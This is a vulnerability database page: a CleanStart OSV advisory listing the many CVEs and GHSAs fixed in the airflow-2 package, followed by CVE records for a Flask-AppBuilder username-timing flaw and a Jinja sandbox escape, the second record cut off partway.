Action not permitted
Modal body text goes here.
Modal Title
Modal Body
Vulnerability from cleanstart
Multiple security vulnerabilities affect the airflow-2 package. These issues are resolved in later releases. See references for individual vulnerability details.
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "airflow-2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.10.3-r2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the airflow-2 package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-FU07345",
"modified": "2026-06-07T16:46:23Z",
"published": "2026-06-08T12:34:30.162472Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-FU07345.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-12797"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-52303"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-52304"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-56201"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2024-56326"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-24023"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-27516"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-32962"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-43859"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-4565"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-53643"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-57804"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-58065"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-68480"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69223"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69224"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69225"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69226"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69227"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69228"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69229"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69230"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-0994"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-21226"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-22815"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23490"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26007"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-27205"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34073"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34513"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34514"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34515"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34516"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34517"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34518"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34519"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34520"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-34525"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41066"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41205"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44307"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44405"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-44503"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-45409"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-27jp-wm6q-gp25"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-27mf-ghqm-j3j8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-29h4-r29x-hchv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2g68-c3qc-8985"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2h4p-vjrc-8xpq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2vrm-gr82-f7m5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2xpw-w6gg-jr37"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38jv-5279-wg99"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3wq7-rqq7-wx6j"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-428g-f7cq-pgp5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5239-wwwm-4pmq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-54jq-c3m8-4m76"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-58pv-8j8x-9vj2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5rjg-fvgr-3xxf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-63hf-3vf5-4wqf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-63vm-454h-vhhq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-65pc-fj4g-8rjx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-68rp-wp8r-4726"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6jhg-hg63-jvvf"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6mq8-rvhq-8wgg"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-752w-5fwx-jx9f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-765j-9r45-w2q2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-78cv-mqj4-43f7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-79v4-65xg-pq4g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7cx3-6m66-7c5m"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7gcm-g887-7qv7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7j59-v9qr-6fq9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-847f-9342-265h"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8495-4g3g-x7pr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-87hc-h4r5-73f7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8qvm-5x2c-j2w7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8rrh-rw8j-w5fx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8w49-h785-mj3c"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9548-qrrj-x5pj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-966j-vmvw-g2g9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9hjg-9r4m-mvj7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c427-h43c-vf67"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cpwx-vrp4-4pq7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f9vj-2wh5-fj8j"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fh55-r93g-j68g"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fqwm-6jpj-5wxc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-g84x-mcqj-x9qq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-gc5v-m9x4-r6x2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-gm62-xv2j-4w53"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-gmj6-6f8f-6699"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h4gh-qq45-vh27"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hcc4-c3v8-rx92"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hgf8-39gv-g3f2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hrfv-mqp8-q5rw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jm66-cg57-jjv5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-jr27-m4p2-rc6r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m5qp-6w8w-w647"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mf9w-mj56-hr94"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mrfv-m5wm-5w6w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mwh4-6h8g-pg8w"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p8q5-cvwx-wvwp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p998-jp59-783m"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pq67-6m6q-mj2v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q2x7-8rv6-6q7h"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-q34m-jh98-gwm2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qccp-gfcp-xxvc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-qjxf-f2mg-c6mc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r244-wg5g-6w2r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r6ph-v2qm-q3c2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v92g-xgxw-vvmm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vfmq-68hx-4jfw"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-vqfr-h8mv-ghfj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w2fm-2cpv-w7v5"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12797"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52303"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52304"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56201"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56326"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24023"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27516"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32962"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43859"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4565"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53643"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57804"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58065"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68480"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69223"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69224"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69225"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69226"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69227"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69228"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69229"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69230"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0994"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21226"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22815"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27205"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34073"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34513"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34514"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34515"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34516"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34517"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34518"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34519"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34520"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34525"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41066"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41205"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44307"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44405"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44503"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2024-12797, CVE-2024-52303, CVE-2024-52304, CVE-2024-56201, CVE-2024-56326, CVE-2025-24023, CVE-2025-27516, CVE-2025-32962, CVE-2025-43859, CVE-2025-4565, CVE-2025-53643, CVE-2025-57804, CVE-2025-58065, CVE-2025-68480, CVE-2025-69223, CVE-2025-69224, CVE-2025-69225, CVE-2025-69226, CVE-2025-69227, CVE-2025-69228, CVE-2025-69229, CVE-2025-69230, CVE-2026-0994, CVE-2026-21226, CVE-2026-22815, CVE-2026-23490, CVE-2026-26007, CVE-2026-27205, CVE-2026-34073, CVE-2026-34513, CVE-2026-34514, CVE-2026-34515, CVE-2026-34516, CVE-2026-34517, CVE-2026-34518, CVE-2026-34519, CVE-2026-34520, CVE-2026-34525, CVE-2026-41066, CVE-2026-41205, CVE-2026-44307, CVE-2026-44405, CVE-2026-44503, CVE-2026-45409, ghsa-27jp-wm6q-gp25, ghsa-27mf-ghqm-j3j8, ghsa-29h4-r29x-hchv, ghsa-2g68-c3qc-8985, ghsa-2h4p-vjrc-8xpq, ghsa-2vrm-gr82-f7m5, ghsa-2xpw-w6gg-jr37, ghsa-38jv-5279-wg99, ghsa-3wq7-rqq7-wx6j, ghsa-428g-f7cq-pgp5, ghsa-5239-wwwm-4pmq, ghsa-54jq-c3m8-4m76, ghsa-58pv-8j8x-9vj2, ghsa-5rjg-fvgr-3xxf, ghsa-63hf-3vf5-4wqf, ghsa-63vm-454h-vhhq, ghsa-65pc-fj4g-8rjx, ghsa-68rp-wp8r-4726, ghsa-6jhg-hg63-jvvf, ghsa-6mq8-rvhq-8wgg, ghsa-752w-5fwx-jx9f, ghsa-765j-9r45-w2q2, ghsa-78cv-mqj4-43f7, ghsa-79v4-65xg-pq4g, ghsa-7cx3-6m66-7c5m, ghsa-7gcm-g887-7qv7, ghsa-7j59-v9qr-6fq9, ghsa-847f-9342-265h, ghsa-8495-4g3g-x7pr, ghsa-87hc-h4r5-73f7, ghsa-8qvm-5x2c-j2w7, ghsa-8rrh-rw8j-w5fx, ghsa-8w49-h785-mj3c, ghsa-9548-qrrj-x5pj, ghsa-966j-vmvw-g2g9, ghsa-9hjg-9r4m-mvj7, ghsa-c427-h43c-vf67, ghsa-cpwx-vrp4-4pq7, ghsa-f9vj-2wh5-fj8j, ghsa-fh55-r93g-j68g, ghsa-fqwm-6jpj-5wxc, ghsa-g84x-mcqj-x9qq, ghsa-gc5v-m9x4-r6x2, ghsa-gm62-xv2j-4w53, ghsa-gmj6-6f8f-6699, ghsa-h4gh-qq45-vh27, ghsa-hcc4-c3v8-rx92, ghsa-hgf8-39gv-g3f2, ghsa-hrfv-mqp8-q5rw, ghsa-jm66-cg57-jjv5, ghsa-jr27-m4p2-rc6r, ghsa-m5qp-6w8w-w647, ghsa-mf9w-mj56-hr94, ghsa-mrfv-m5wm-5w6w, ghsa-mwh4-6h8g-pg8w, ghsa-p8q5-cvwx-wvwp, ghsa-p998-jp59-783m, ghsa-pq67-6m6q-mj2v, ghsa-q2x7-8rv6-6q7h, ghsa-q34m-jh98-gwm2, ghsa-qccp-gfcp-xxvc, ghsa-qjxf-f2mg-c6mc, ghsa-r244-wg5g-6w2r, ghsa-r6ph-v2qm-q3c2, ghsa-v92g-xgxw-vvmm, ghsa-vfmq-68hx-4jfw, ghsa-vqfr-h8mv-ghfj, ghsa-w2fm-2cpv-w7v5 applied in versions: 2.10.3-r0, 2.10.3-r2",
"upstream": [
"CVE-2024-12797",
"CVE-2024-52303",
"CVE-2024-52304",
"CVE-2024-56201",
"CVE-2024-56326",
"CVE-2025-24023",
"CVE-2025-27516",
"CVE-2025-32962",
"CVE-2025-43859",
"CVE-2025-4565",
"CVE-2025-53643",
"CVE-2025-57804",
"CVE-2025-58065",
"CVE-2025-68480",
"CVE-2025-69223",
"CVE-2025-69224",
"CVE-2025-69225",
"CVE-2025-69226",
"CVE-2025-69227",
"CVE-2025-69228",
"CVE-2025-69229",
"CVE-2025-69230",
"CVE-2026-0994",
"CVE-2026-21226",
"CVE-2026-22815",
"CVE-2026-23490",
"CVE-2026-26007",
"CVE-2026-27205",
"CVE-2026-34073",
"CVE-2026-34513",
"CVE-2026-34514",
"CVE-2026-34515",
"CVE-2026-34516",
"CVE-2026-34517",
"CVE-2026-34518",
"CVE-2026-34519",
"CVE-2026-34520",
"CVE-2026-34525",
"CVE-2026-41066",
"CVE-2026-41205",
"CVE-2026-44307",
"CVE-2026-44405",
"CVE-2026-44503",
"CVE-2026-45409",
"ghsa-27jp-wm6q-gp25",
"ghsa-27mf-ghqm-j3j8",
"ghsa-29h4-r29x-hchv",
"ghsa-2g68-c3qc-8985",
"ghsa-2h4p-vjrc-8xpq",
"ghsa-2vrm-gr82-f7m5",
"ghsa-2xpw-w6gg-jr37",
"ghsa-38jv-5279-wg99",
"ghsa-3wq7-rqq7-wx6j",
"ghsa-428g-f7cq-pgp5",
"ghsa-5239-wwwm-4pmq",
"ghsa-54jq-c3m8-4m76",
"ghsa-58pv-8j8x-9vj2",
"ghsa-5rjg-fvgr-3xxf",
"ghsa-63hf-3vf5-4wqf",
"ghsa-63vm-454h-vhhq",
"ghsa-65pc-fj4g-8rjx",
"ghsa-68rp-wp8r-4726",
"ghsa-6jhg-hg63-jvvf",
"ghsa-6mq8-rvhq-8wgg",
"ghsa-752w-5fwx-jx9f",
"ghsa-765j-9r45-w2q2",
"ghsa-78cv-mqj4-43f7",
"ghsa-79v4-65xg-pq4g",
"ghsa-7cx3-6m66-7c5m",
"ghsa-7gcm-g887-7qv7",
"ghsa-7j59-v9qr-6fq9",
"ghsa-847f-9342-265h",
"ghsa-8495-4g3g-x7pr",
"ghsa-87hc-h4r5-73f7",
"ghsa-8qvm-5x2c-j2w7",
"ghsa-8rrh-rw8j-w5fx",
"ghsa-8w49-h785-mj3c",
"ghsa-9548-qrrj-x5pj",
"ghsa-966j-vmvw-g2g9",
"ghsa-9hjg-9r4m-mvj7",
"ghsa-c427-h43c-vf67",
"ghsa-cpwx-vrp4-4pq7",
"ghsa-f9vj-2wh5-fj8j",
"ghsa-fh55-r93g-j68g",
"ghsa-fqwm-6jpj-5wxc",
"ghsa-g84x-mcqj-x9qq",
"ghsa-gc5v-m9x4-r6x2",
"ghsa-gm62-xv2j-4w53",
"ghsa-gmj6-6f8f-6699",
"ghsa-h4gh-qq45-vh27",
"ghsa-hcc4-c3v8-rx92",
"ghsa-hgf8-39gv-g3f2",
"ghsa-hrfv-mqp8-q5rw",
"ghsa-jm66-cg57-jjv5",
"ghsa-jr27-m4p2-rc6r",
"ghsa-m5qp-6w8w-w647",
"ghsa-mf9w-mj56-hr94",
"ghsa-mrfv-m5wm-5w6w",
"ghsa-mwh4-6h8g-pg8w",
"ghsa-p8q5-cvwx-wvwp",
"ghsa-p998-jp59-783m",
"ghsa-pq67-6m6q-mj2v",
"ghsa-q2x7-8rv6-6q7h",
"ghsa-q34m-jh98-gwm2",
"ghsa-qccp-gfcp-xxvc",
"ghsa-qjxf-f2mg-c6mc",
"ghsa-r244-wg5g-6w2r",
"ghsa-r6ph-v2qm-q3c2",
"ghsa-v92g-xgxw-vvmm",
"ghsa-vfmq-68hx-4jfw",
"ghsa-vqfr-h8mv-ghfj",
"ghsa-w2fm-2cpv-w7v5"
]
}
CVE-2025-24023 (GCVE-0-2025-24023)
Vulnerability from cvelistv5 – Published: 2025-03-03 15:25 – Updated: 2025-03-03 18:41- CWE-204 - Observable Response Discrepancy
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| dpgaspar | Flask-AppBuilder |
Affected:
< 4.5.3
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-24023",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-03T18:41:12.287165Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-03T18:41:23.427Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Flask-AppBuilder",
"vendor": "dpgaspar",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Flask-AppBuilder is an application development framework. Prior to 4.5.3, Flask-AppBuilder allows unauthenticated users to enumerate existing usernames by timing the response time from the server when brute forcing requests to login. This vulnerability is fixed in 4.5.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204: Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-03T15:25:55.437Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-p8q5-cvwx-wvwp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-p8q5-cvwx-wvwp"
}
],
"source": {
"advisory": "GHSA-p8q5-cvwx-wvwp",
"discovery": "UNKNOWN"
},
"title": "Observable Response Discrepancy in flask-appbuilder"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-24023",
"datePublished": "2025-03-03T15:25:55.437Z",
"dateReserved": "2025-01-16T17:31:06.459Z",
"dateUpdated": "2025-03-03T18:41:23.427Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-56326 (GCVE-0-2024-56326)
Vulnerability from cvelistv5 – Published: 2024-12-23 15:43 – Updated: 2025-11-03 19:32| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-56326",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-12-27T17:50:50.460995Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-12-27T17:54:33.724Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T19:32:16.045Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "jinja",
"vendor": "pallets",
"versions": [
{
"status": "affected",
"version": "\u003c 3.1.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Jinja is an extensible templating engine. Prior to 3.1.5, An oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja\u0027s sandbox does catch calls to str.format and ensures they don\u0027t escape the sandbox. However, it\u0027s possible to store a reference to a malicious string\u0027s format method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox. This vulnerability is fixed in 3.1.5."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "LOCAL",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1336",
"description": "CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-693",
"description": "CWE-693: Protection Mechanism Failure",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-12-23T15:43:49.400Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h"
},
{
"name": "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4"
},
{
"name": "https://github.com/pallets/jinja/releases/tag/3.1.5",
